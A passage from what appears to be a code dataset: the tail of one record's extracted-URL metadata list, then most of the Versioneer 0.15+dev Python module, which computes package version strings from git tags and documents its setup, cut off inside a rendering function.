['URL', 'self.do'], ['URL', 'vidzi.tv'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 'sharesix.com'], ['URL', 'streamcloud.eu'], ['URL', 'self.do'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'xbmc.sl'], ['URL', 'self.do'], ['URL', 'vidhog.com'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'xbmc.sl'], ['URL', 'self.do'], ['URL', 'vidto.me'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'xbmc.sl'], ['URL', 'self.do'], ['URL', 'vodlocker.com'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'xbmc.sl'], ['URL', 'self.do'], ['URL', 'hcbit.com'], ['URL', 'e.co'], ['URL', 'response.in'], ['URL', 'response.in'], ['URL', 're.DO'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'bestreams.net'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'xbmc.sl'], ['URL', 'self.us'], ['URL', 'self.do'], ['URL', 'thevideo.me'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'vidzi.tv'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'e.co'], ['URL', 'response.re'], ['URL', 'response.cl'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 'thefile.me'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'sharerepo.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'filenuke.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'sharerepo.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'letwatch.us'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'thevideo.me'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'vidto.me'], ['URL', 're.fi'], ['URL', 'allmyvideos.net'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'realvid.net'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'uptobox.com'], ['URL', 'self.do'], ['URL', 'uptostream.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.DO'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'xbmc.sl'], ['URL', 'e.co'], ['URL', 'response.re'], ['URL', 'response.cl'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'response.co'], ['URL', 'response.ms'], ['URL', 'response.in'], ['URL', 'self.parent.er']]"
108,"
# Version: 0.15+dev
""""""The Versioneer - like a rocketeer, but for versions.
The Versioneer
==============
* like a rocketeer, but for versions!
* https://github.com/warner/python-versioneer
* Brian Warner
* License: Public Domain
* Compatible With: python2.6, 2.7, 3.2, 3.3, 3.4, and pypy
* [![Latest Version]
(https://pypip.in/version/versioneer/badge.svg?style=flat)
](https://pypi.python.org/pypi/versioneer/)
* [![Build Status]
(https://travis-ci.org/warner/python-versioneer.png?branch=master)
](https://travis-ci.org/warner/python-versioneer)
This is a tool for managing a recorded version number in distutils-based
python projects. The goal is to remove the tedious and error-prone ""update
the embedded version string"" step from your release process. Making a new
release should be as easy as recording a new tag in your version-control
system, and maybe making new tarballs.
## Quick Install
* `pip install versioneer` to somewhere to your $PATH
* add a `[versioneer]` section to your setup.cfg (see below)
* run `versioneer install` in your source tree, commit the results
## Version Identifiers
Source trees come from a variety of places:
* a version-control system checkout (mostly used by developers)
* a nightly tarball, produced by build automation
* a snapshot tarball, produced by a web-based VCS browser, like github's
""tarball from tag"" feature
* a release tarball, produced by ""setup.py sdist"", distributed through PyPI
Within each source tree, the version identifier (either a string or a number,
this tool is format-agnostic) can come from a variety of places:
* ask the VCS tool itself, e.g. ""git describe"" (for checkouts), which knows
about recent ""tags"" and an absolute revision-id
* the name of the directory into which the tarball was unpacked
* an expanded VCS keyword ($Id$, etc)
* a `_version.py` created by some earlier build step
For released software, the version identifier is closely related to a VCS
tag. Some projects use tag names that include more than just the version
string (e.g. ""myproject-1.2"" instead of just ""1.2""), in which case the tool
needs to strip the tag prefix to extract the version identifier. For
unreleased software (between tags), the version identifier should provide
enough information to help developers recreate the same tree, while also
giving them an idea of roughly how old the tree is (after version 1.2, before
version 1.3). Many VCS systems can report a description that captures this,
for example `git describe --tags --dirty --always` reports things like
""0.7-1-g574ab98-dirty"" to indicate that the checkout is one revision past the
0.7 tag, has a unique revision id of ""574ab98"", and is ""dirty"" (it has
uncommitted changes.
The version identifier is used for multiple purposes:
* to allow the module to self-identify its version: `myproject.__version__`
* to choose a name and prefix for a 'setup.py sdist' tarball
## Theory of Operation
Versioneer works by adding a special `_version.py` file into your source
tree, where your `__init__.py` can import it. This `_version.py` knows how to
dynamically ask the VCS tool for version information at import time.
`_version.py` also contains `$Revision$` markers, and the installation
process marks `_version.py` to have this marker rewritten with a tag name
during the `git archive` command. As a result, generated tarballs will
contain enough information to get the proper version.
To allow `setup.py` to compute a version too, a `versioneer.py` is added to
the top level of your source tree, next to `setup.py` and the `setup.cfg`
that configures it. This overrides several distutils/setuptools commands to
compute the version when invoked, and changes `setup.py build` and `setup.py
sdist` to replace `_version.py` with a small static file that contains just
the generated version data.
## Installation
First, decide on values for the following configuration variables:
* `VCS`: the version control system you use. Currently accepts ""git"".
* `style`: the style of version string to be produced. See ""Styles"" below for
details. Defaults to ""pep440"", which looks like
`TAG[+DISTANCE.gSHORTHASH[.dirty]]`.
* `versionfile_source`:
A project-relative pathname into which the generated version strings should
be written. This is usually a `_version.py` next to your project's main
`__init__.py` file, so it can be imported at runtime. If your project uses
`src/myproject/__init__.py`, this should be `src/myproject/_version.py`.
This file should be checked in to your VCS as usual: the copy created below
by `setup.py setup_versioneer` will include code that parses expanded VCS
keywords in generated tarballs. The 'build' and 'sdist' commands will
replace it with a copy that has just the calculated version string.
This must be set even if your project does not have any modules (and will
therefore never import `_version.py`), since ""setup.py sdist"" -based trees
still need somewhere to record the pre-calculated version strings. Anywhere
in the source tree should do. If there is a `__init__.py` next to your
`_version.py`, the `setup.py setup_versioneer` command (described below)
will append some `__version__`-setting assignments, if they aren't already
present.
* `versionfile_build`:
Like `versionfile_source`, but relative to the build directory instead of
the source directory. These will differ when your setup.py uses
'package_dir='. If you have `package_dir={'myproject': 'src/myproject'}`,
then you will probably have `versionfile_build='myproject/_version.py'` and
`versionfile_source='src/myproject/_version.py'`.
If this is set to None, then `setup.py build` will not attempt to rewrite
any `_version.py` in the built tree. If your project does not have any
libraries (e.g. if it only builds a script), then you should use
`versionfile_build = None`. To actually use the computed version string,
your `setup.py` will need to override `distutils.command.build_scripts`
with a subclass that explicitly inserts a copy of
`versioneer.get_version()` into your script file. See
`test/demoapp-script-only/setup.py` for an example.
* `tag_prefix`:
a string, like 'PROJECTNAME-', which appears at the start of all VCS tags.
If your tags look like 'myproject-1.2.0', then you should use
tag_prefix='myproject-'. If you use unprefixed tags like '1.2.0', this
should be an empty string, using either `tag_prefix=` or `tag_prefix=''`.
* `parentdir_prefix`:
a optional string, frequently the same as tag_prefix, which appears at the
start of all unpacked tarball filenames. If your tarball unpacks into
'myproject-1.2.0', this should be 'myproject-'. To disable this feature,
just omit the field from your `setup.cfg`.
This tool provides one script, named `versioneer`. That script has one mode,
""install"", which writes a copy of `versioneer.py` into the current directory
and runs `versioneer.py setup` to finish the installation.
To versioneer-enable your project:
* 1: Modify your `setup.cfg`, adding a section named `[versioneer]` and
populating it with the configuration values you decided earlier (note that
the option names are not case-sensitive):
````
[versioneer]
VCS = git
style = pep440
versionfile_source = src/myproject/_version.py
versionfile_build = myproject/_version.py
tag_prefix =
parentdir_prefix = myproject-
````
* 2: Run `versioneer install`. This will do the following:
* copy `versioneer.py` into the top of your source tree
* create `_version.py` in the right place (`versionfile_source`)
* modify your `__init__.py` (if one exists next to `_version.py`) to define
`__version__` (by calling a function from `_version.py`)
* modify your `MANIFEST.in` to include both `versioneer.py` and the
generated `_version.py` in sdist tarballs
`versioneer install` will complain about any problems it finds with your
`setup.py` or `setup.cfg`. Run it multiple times until you have fixed all
the problems.
* 3: add a `import versioneer` to your setup.py, and add the following
arguments to the setup() call:
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
* 4: commit these changes to your VCS. To make sure you won't forget,
`versioneer install` will mark everything it touched for addition using
`git add`. Don't forget to add `setup.py` and `setup.cfg` too.
## Post-Installation Usage
Once established, all uses of your tree from a VCS checkout should get the
current version string. All generated tarballs should include an embedded
version string (so users who unpack them will not need a VCS tool installed).
If you distribute your project through PyPI, then the release process should
boil down to two steps:
* 1: git tag 1.0
* 2: python setup.py register sdist upload
If you distribute it through github (i.e. users use github to generate
tarballs with `git archive`), the process is:
* 1: git tag 1.0
* 2: git push; git push --tags
Versioneer will report ""0+untagged.NUMCOMMITS.gHASH"" until your tree has at
least one tag in its history.
## Version-String Flavors
Code which uses Versioneer can learn about its version string at runtime by
importing `_version` from your main `__init__.py` file and running the
`get_versions()` function. From the ""outside"" (e.g. in `setup.py`), you can
import the top-level `versioneer.py` and run `get_versions()`.
Both functions return a dictionary with different flavors of version
information:
* `['version']`: A condensed version string, rendered using the selected
style. This is the most commonly used value for the project's version
string. The default ""pep440"" style yields strings like `0.11`,
`0.11+2.g1076c97`, or `0.11+2.g1076c97.dirty`. See the ""Styles"" section
below for alternative styles.
* `['full-revisionid']`: detailed revision identifier. For Git, this is the
full SHA1 commit id, e.g. ""PI:KEY"".
* `['dirty']`: a boolean, True if the tree has uncommitted changes. Note that
this is only accurate if run in a VCS checkout, otherwise it is likely to
be False or None
* `['error']`: if the version string could not be computed, this will be set
to a string describing the problem, otherwise it will be None. It may be
useful to throw an exception in setup.py if this is set, to avoid e.g.
creating tarballs with a version string of ""unknown"".
Some variants are more useful than others. Including `full-revisionid` in a
bug report should allow developers to reconstruct the exact code being tested
(or indicate the presence of local changes that should be shared with the
developers). `version` is suitable for display in an ""about"" box or a CLI
`--version` output: it can be easily compared against release notes and lists
of bugs fixed in various releases.
The installer adds the following text to your `__init__.py` to place a basic
version in `YOURPROJECT.__version__`:
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
## Styles
The setup.cfg `style=` configuration controls how the VCS information is
rendered into a version string.
The default style, ""pep440"", produces a PEP440-compliant string, equal to the
un-prefixed tag name for actual releases, and containing an additional ""local
version"" section with more detail for in-between builds. For Git, this is
TAG[+DISTANCE.gHEX[.dirty]] , using information from `git describe --tags
--dirty --always`. For example ""0.11+2.g1076c97.dirty"" indicates that the
tree is like the ""1076c97"" commit but has uncommitted changes ("".dirty""), and
that this commit is two revisions (""+2"") beyond the ""0.11"" tag. For released
software (exactly equal to a known tag), the identifier will only contain the
stripped tag, e.g. ""0.11"".
Other styles are available. See details.md in the Versioneer source tree for
descriptions.
## Debugging
Versioneer tries to avoid fatal errors: if something goes wrong, it will tend
to return a version of ""0+unknown"". To investigate the problem, run `setup.py
version`, which will run the version-lookup code in a verbose mode, and will
display the full contents of `get_versions()` (including the `error` string,
which may help identify what went wrong).
## Updating Versioneer
To upgrade your project to a new release of Versioneer, do the following:
* install the new Versioneer (`pip install -U versioneer` or equivalent)
* edit `setup.cfg`, if necessary, to include any new configuration settings
indicated by the release notes
* re-run `versioneer install` in your source tree, to replace
`SRC/_version.py`
* commit any changed files
### Upgrading to 0.15
Starting with this version, Versioneer is configured with a `[versioneer]`
section in your `setup.cfg` file. Earlier versions required the `setup.py` to
set attributes on the `versioneer` module immediately after import. The new
version will refuse to run (raising an exception during import) until you
have provided the necessary `setup.cfg` section.
In addition, the Versioneer package provides an executable named
`versioneer`, and the installation process is driven by running `versioneer
install`. In 0.14 and earlier, the executable was named
`versioneer-installer` and was run without an argument.
### Upgrading to 0.14
0.14 changes the format of the version string. 0.13 and earlier used
hyphen-separated strings like ""0.11-2-g1076c97-dirty"". 0.14 and beyond use a
plus-separated ""local version"" section strings, with dot-separated
components, like ""0.11+2.g1076c97"". PEP440-strict tools did not like the old
format, but should be ok with the new one.
### Upgrading from 0.11 to 0.12
Nothing special.
### Upgrading from 0.10 to 0.11
You must add a `versioneer.VCS = ""git""` to your `setup.py` before re-running
`setup.py setup_versioneer`. This will enable the use of additional
version-control systems (SVN, etc) in the future.
## Future Directions
This tool is designed to make it easily extended to other version-control
systems: all VCS-specific components are in separate directories like
src/git/ . The top-level `versioneer.py` script is assembled from these
components by running make-versioneer.py . In the future, make-versioneer.py
will take a VCS name as an argument, and will construct a version of
`versioneer.py` that is specific to the given VCS. It might also take the
configuration arguments that are currently provided manually during
installation by editing setup.py . Alternatively, it might go the other
direction and include code from all supported VCS systems, reducing the
number of intermediate scripts.
## License
To make Versioneer easier to embed, all its code is dedicated to the public
domain. The `_version.py` that it creates is also in the public domain.
Specifically, both are released under the Creative Commons ""Public Domain
Dedication"" license (CC0-1.0), as described in
https://creativecommons.org/publicdomain/zero/1.0/ .
""""""
from __future__ import print_function
try:
import configparser
except ImportError:
import ConfigParser as configparser
import errno
import json
import os
import re
import subprocess
import sys
class VersioneerConfig:
""""""Container for Versioneer configuration parameters.""""""
def get_root():
""""""Get the project root directory.
We require that all commands are run from the project root, i.e. the
directory that contains setup.py, setup.cfg, and versioneer.py .
""""""
root = os.path.realpath(os.path.abspath(os.getcwd()))
setup_py = os.path.join(root, ""setup.py"")
versioneer_py = os.path.join(root, ""versioneer.py"")
if not (os.path.exists(setup_py) or os.path.exists(versioneer_py)):
# allow 'python path/to/setup.py COMMAND'
root = os.path.dirname(os.path.realpath(os.path.abspath(sys.argv[0])))
setup_py = os.path.join(root, ""setup.py"")
versioneer_py = os.path.join(root, ""versioneer.py"")
if not (os.path.exists(setup_py) or os.path.exists(versioneer_py)):
err = (""Versioneer was unable to run the project root directory. ""
""Versioneer requires setup.py to be executed from ""
""its immediate directory (like 'python setup.py COMMAND'), ""
""or in a way that lets it use sys.argv[0] to find the root ""
""(like 'python path/to/setup.py COMMAND')."")
raise VersioneerBadRootError(err)
try:
# Certain runtime workflows (setup.py install/develop in a setuptools
# tree) execute all dependencies in a single python process, so
# ""versioneer"" may be imported multiple times, and python's shared
# module-import table will cache the first one. So we can't use
# os.path.dirname(__file__), as that will find whichever
# versioneer.py was first imported, even in later projects.
me = os.path.realpath(os.path.abspath(__file__))
if os.path.splitext(me)[0] != os.path.splitext(versioneer_py)[0]:
print(""Warning: build in %s is using versioneer.py from %s""
% (os.path.dirname(me), versioneer_py))
except NameError:
pass
return root
def get_config_from_root(root):
""""""Read the project setup.cfg file to determine Versioneer config.""""""
# This might raise EnvironmentError (if setup.cfg is missing), or
# configparser.NoSectionError (if it lacks a [versioneer] section), or
# configparser.NoOptionError (if it lacks ""VCS=""). See the docstring at
# the top of versioneer.py for instructions on writing your setup.cfg .
setup_cfg = os.path.join(root, ""setup.cfg"")
parser = configparser.SafeConfigParser()
with open(setup_cfg, ""r"") as f:
parser.readfp(f)
VCS = parser.get(""versioneer"", ""VCS"") # mandatory
def get(parser, name):
if parser.has_option(""versioneer"", name):
return parser.get(""versioneer"", name)
return None
cfg = VersioneerConfig()
cfg.VCS = VCS
cfg.style = get(parser, ""style"") or """"
cfg.versionfile_source = get(parser, ""versionfile_source"")
cfg.versionfile_build = get(parser, ""versionfile_build"")
cfg.tag_prefix = get(parser, ""tag_prefix"")
if cfg.tag_prefix in (""''"", '""""'):
cfg.tag_prefix = """"
cfg.parentdir_prefix = get(parser, ""parentdir_prefix"")
cfg.verbose = get(parser, ""verbose"")
return cfg
class NotThisMethod(Exception):
""""""Exception raised if a method is not valid for the current scenario.""""""
# these dictionaries contain VCS-specific tools
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
""""""Decorator to mark a method as the handler for a particular VCS.""""""
def decorate(f):
""""""Store f in HANDLERS[vcs][method].""""""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False):
""""""Call the given command(s).""""""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print(""unable to run %s"" % dispcmd)
print(e)
return None
else:
if verbose:
print(""unable to find command, tried %s"" % (commands,))
return None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print(""unable to run %s (error)"" % dispcmd)
return None
return stdout
LONG_VERSION_PY['git'] = r'''
# This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by githubs download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# directories (produced by setup.py build) will contain a much shorter file
# that just contains the computed version number.
# This file is released into the public domain. Generated by
# versioneer-0.15+dev (https://github.com/warner/python-versioneer)
""""""Git implementation of _version.py.""""""
import errno
import os
import re
import subprocess
import sys
def get_keywords():
""""""Get the keywords needed to look up the version information.""""""
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = ""%(DOLLAR)sFormat:%%d%(DOLLAR)s""
git_full = ""%(DOLLAR)sFormat:%%H%(DOLLAR)s""
keywords = {""refnames"": git_refnames, ""full"": git_full}
return keywords
class VersioneerConfig:
""""""Container for Versioneer configuration parameters.""""""
def get_config():
""""""Create, populate and return the VersioneerConfig() object.""""""
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = ""git""
cfg.style = ""%(STYLE)s""
cfg.tag_prefix = ""%(TAG_PREFIX)s""
cfg.parentdir_prefix = ""%(PARENTDIR_PREFIX)s""
cfg.versionfile_source = ""%(VERSIONFILE_SOURCE)s""
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
""""""Exception raised if a method is not valid for the current scenario.""""""
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
""""""Decorator to mark a method as the handler for a particular VCS.""""""
def decorate(f):
""""""Store f in HANDLERS[vcs][method].""""""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False):
""""""Call the given command(s).""""""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print(""unable to run %%s"" %% dispcmd)
print(e)
return None
else:
if verbose:
print(""unable to find command, tried %%s"" %% (commands,))
return None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print(""unable to run %%s (error)"" %% dispcmd)
return None
return stdout
def versions_from_parentdir(parentdir_prefix, root, verbose):
""""""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes
both the project name and a version string.
""""""
dirname = os.path.basename(root)
if not dirname.startswith(parentdir_prefix):
if verbose:
print(""guessing rootdir is '%%s', but '%%s' doesn't start with ""
""prefix '%%s'"" %% (root, dirname, parentdir_prefix))
raise NotThisMethod(""rootdir doesn't start with parentdir_prefix"")
return {""version"": dirname[len(parentdir_prefix):],
""full-revisionid"": None,
""dirty"": False, ""error"": None}
@register_vcs_handler(""git"", ""get_keywords"")
def git_get_keywords(versionfile_abs):
""""""Extract version information from the given file.""""""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, ""r"")
for line in f.readlines():
if line.strip().startswith(""git_refnames =""):
mo = re.search(r'=\s*""(.*)""', line)
if mo:
keywords[""refnames""] = mo.group(1)
if line.strip().startswith(""git_full =""):
mo = re.search(r'=\s*""(.*)""', line)
if mo:
keywords[""full""] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler(""git"", ""keywords"")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
""""""Get version information from git keywords.""""""
if not keywords:
raise NotThisMethod(""no keywords at all, weird"")
refnames = keywords[""refnames""].strip()
if refnames.startswith(""$Format""):
if verbose:
print(""keywords are unexpanded, not using"")
raise NotThisMethod(""unexpanded keywords, not a git-archive tarball"")
refs = [r.strip() for r in refnames.strip(""()"").split("","")]
# starting in git-1.8.3, tags are listed as ""tag: foo-1.0"" instead of
# just ""foo-1.0"". If we see a ""tag: "" prefix, prefer those.
TAG = ""tag: ""
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %%d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like ""release"" and
# ""stabilization"", as well as ""HEAD"" and ""master"".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print(""discarding '%%s', no digits"" %% "","".join(set(refs) - tags))
if verbose:
print(""likely tags: %%s"" %% "","".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. ""2.0"" over ""2.0rc1""
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print(""picking %%s"" %% r)
return {""version"": r,
""full-revisionid"": keywords[""full""].strip(),
""dirty"": False, ""error"": None, ""branch"": None
}
# no suitable tags, so version is ""0+unknown"", but full hex is still there
if verbose:
print(""no suitable tags, using unknown + full revision id"")
return {""version"": ""0+unknown"",
""full-revisionid"": keywords[""full""].strip(),
""dirty"": False, ""error"": ""no suitable tags"",
""branch"": None}
@register_vcs_handler(""git"", ""pieces_from_vcs"")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
""""""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
""""""
if not os.path.exists(os.path.join(root, "".git"")):
if verbose:
print(""no .git in %%s"" %% root)
raise NotThisMethod(""no .git directory"")
GITS = [""git""]
if sys.platform == ""win32"":
GITS = [""git.cmd"", ""git.exe""]
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM). Note, for git v1.7
# and below, it is necessary to run ""git update-index --refresh"" first.
describe_out = run_command(GITS, [""describe"", ""--tags"", ""--dirty"",
""--always"", ""--long"",
""--match"", ""%%s*"" %% tag_prefix],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod(""'git describe' failed"")
describe_out = describe_out.strip()
full_out = run_command(GITS, [""rev-parse"", ""HEAD""], cwd=root)
if full_out is None:
raise NotThisMethod(""'git rev-parse' failed"")
full_out = full_out.strip()
pieces = {}
pieces[""long""] = full_out
pieces[""short""] = full_out[:7] # maybe improved later
pieces[""error""] = None
# abbrev-ref available with git >= 1.7
branch_name = run_command(GITS, [""rev-parse"", ""--abbrev-ref"", ""HEAD""],
cwd=root).strip()
if branch_name == 'HEAD':
branches = run_command(GITS, [""branch"", ""--contains""],
cwd=root).split('\n')
branches = [branch[2:] for branch in branches if branch[4:5] != '(']
if 'master' in branches:
branch_name = 'master'
elif not branches:
branch_name = None
else:
# Pick the first branch that is returned. Good or bad.
branch_name = branches[0]
pieces['branch'] = branch_name
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith(""-dirty"")
pieces[""dirty""] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex(""-dirty"")]
# now we have TAG-NUM-gHEX or HEX
if ""-"" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces[""error""] = (""unable to parse git-describe output: '%%s'""
%% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = ""tag '%%s' doesn't start with prefix '%%s'""
print(fmt %% (full_tag, tag_prefix))
pieces[""error""] = (""tag '%%s' doesn't start with prefix '%%s'""
%% (full_tag, tag_prefix))
return pieces
pieces[""closest-tag""] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces[""distance""] = int(mo.group(2))
# commit: short hex revision ID
pieces[""short""] = mo.group(3)
else:
# HEX: no tags
pieces[""closest-tag""] = None
count_out = run_command(GITS, [""rev-list"", ""HEAD"", ""--count""],
cwd=root)
pieces[""distance""] = int(count_out) # total number of commits
return pieces
# Default matches v1.2.x, maint/1.2.x, 1.2.x, 1.x etc.
default_maint_branch_regexp = "".*([0-9]+\.)+x$""
def plus_or_dot(pieces):
""""""Return a + if we don't already have one, else return a .""""""
if ""+"" in pieces.get(""closest-tag"", """"):
return "".""
return ""+""
def render_pep440(pieces):
""""""Build up version string, with post-release ""local version identifier"".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
""""""
if pieces[""closest-tag""]:
rendered = pieces[""closest-tag""]
if pieces[""distance""] or pieces[""dirty""]:
rendered += plus_or_dot(pieces)
rendered += ""%%d.g%%s"" %% (pieces[""distance""], pieces[""short""])
if pieces[""dirty""]:
rendered += "".dirty""
else:
# exception #1
rendered = ""0+untagged.%%d.g%%s"" %% (pieces[""distance""],
pieces[""short""])
if pieces[""dirty""]:
rendered += "".dirty""
return rendered
def render_pep440_pre(pieces):
""""""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
""""""
if pieces[""closest-tag""]:
rendered = pieces[""closest-tag""]
if pieces[""distance""]:
rendered += "".post.dev%%d"" %% pieces[""distance""]
else:
# exception #1
rendered = ""0.post.dev%%d"" %% pieces[""distance""]
return rendered
def render_pep440_post(pieces):
""""""TAG[.postDISTANCE[.dev0]+gHEX] .
The "".dev0"" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear ""older"" than the corresponding clean one),
but you shouldn't be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
""""""
if pieces[""closest-tag""]:
rendered = pieces[""closest-tag""]
if pieces[""distance""] or pieces[""dirty""]:
rendered += "".post%%d"" %% pieces[""distance""]
if pieces[""dirty""]:
rendered += "".dev0""
rendered += plus_or_dot(pieces)
rendered += ""g%%s"" %% pieces[""short""]
else:
# exception #1
rendered = ""0.post%%d"" %% pieces[""distance""]
if pieces[""dirty""]:
rendered += "".dev0""
rendered += ""+g%%s"" %% pieces[""short""]
return rendered
def render_pep440_old(pieces):
""""""TAG[.postDISTANCE[.dev0]] .
The "".dev0"" means dirty.
Eexceptions:
1: no tags. 0.postDISTANCE[.dev0]
""""""
if pieces[""closest-tag""]:
rendered = pieces[""closest-tag""]
